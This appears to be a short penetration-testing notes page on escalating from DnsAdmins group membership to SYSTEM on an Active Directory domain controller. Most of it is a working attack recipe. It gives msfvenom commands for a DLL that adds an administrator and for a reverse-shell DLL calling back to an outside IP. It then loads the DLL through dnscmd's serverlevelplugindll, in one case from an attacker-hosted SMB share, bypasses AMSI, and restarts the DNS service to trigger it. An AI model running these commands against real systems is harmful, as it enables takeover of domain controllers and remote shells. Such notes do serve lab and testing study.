DnsAdmins

DNSAdmin to DC

DnsAdmins group members have access to DNS information on the network. The DNS service runs as NT AUTHORITY\SYSTEM. This can be used to escalate privileges on a DC or other server that is acting as the DNS server for the domain.

It is possible to use the built-in dnscmd utility to specify the path of the plugin DLL. Then load a custom DLL which will be loaded after the DNS service has restarted.

Domain Controllers and DNS

  • In Active Directory environments, Domain Controllers often act as DNS servers.

  • DNS servers are critical to Active Directory operation and are accessible to most domain users.

  • Microsoft implemented a custom DNS management protocol over Remote Procedure Call (RPC) for managing DNS.

The combination of the DNS protocol and the custom management protocol introduces a significant attack surface on Domain Controllers.

How to exploit

Generate a malicious DLL to execute commands

# Add user to group
msfvenom -p windows/x64/exec cmd='net group "Administrators" ryan /add' -f dll -o adduser.dll

# Reverse shell
 msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.153 LPORT=443 -f dll -o reverse.dll

Load the custom DLL

dnscmd.exe /config /serverlevelplugindll C:\Users\public\reverse.dll

From target run 

# From evil-winrm 
Bypass-4MSI
dnscmd.exe /config /serverlevelplugindll 'C:\users\ryan\reverse.dll'

# Using smb server
impacket-smbserver share -smb2support .
dnscmd localhost /config /serverlevelplugindll \\10.10.14.153\share\reverse.dll

Finally stop and start DNS again to trigger the DLL file.

sc.exe stop dns
sc.exe start dns

Last updated

Was this helpful?